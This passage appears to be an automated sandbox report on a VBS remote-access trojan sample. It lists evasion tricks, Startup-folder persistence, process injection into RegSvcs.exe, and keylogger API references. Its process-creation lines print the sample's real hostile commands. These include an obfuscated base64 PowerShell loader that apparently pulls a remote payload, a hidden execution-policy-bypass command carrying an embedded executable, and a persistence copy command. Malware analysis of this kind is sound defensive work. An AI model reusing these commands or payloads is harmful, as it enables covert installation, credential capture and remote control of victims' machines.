Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6172 Thread sleep count: 1474 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6172 Thread sleep count: 1531 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6028 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3212 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5808 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5052 Thread sleep count: 1125 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132 Thread sleep count: 146 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6656 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6664 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3032 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 492 Thread sleep count: 5825 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6112 Thread sleep count: 3134 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6220 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1474 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1531 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1421 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 483 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1125 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 9586 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5825 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3134 Jump to behavior
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFC08383B70 sldt word ptr [eax] 16_2_00007FFC08383B70
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior
Source: powershell.exe, 00000010.00000003.347930984.0000021665B8D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.357370872.0000021665B8F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000003.353224141.0000021665B8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 408000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40A000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 11CA008 Jump to behavior
.NET source code references suspicious native API functions
Source: 22.0.RegSvcs.exe.400000.1.unpack, Program.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 22.0.RegSvcs.exe.400000.1.unpack, Keylogger.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 22.0.RegSvcs.exe.400000.3.unpack, Program.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 22.0.RegSvcs.exe.400000.3.unpack, Keylogger.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 22.0.RegSvcs.exe.400000.2.unpack, Program.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 22.0.RegSvcs.exe.400000.2.unpack, Keylogger.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 22.2.RegSvcs.exe.400000.0.unpack, Program.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 22.2.RegSvcs.exe.400000.0.unpack, Keylogger.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 22.0.RegSvcs.exe.400000.0.unpack, Program.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 22.0.RegSvcs.exe.400000.0.unpack, Keylogger.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 22.0.RegSvcs.exe.400000.4.unpack, Program.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 22.0.RegSvcs.exe.400000.4.unpack, Keylogger.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Injects a PE file into a foreign processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? 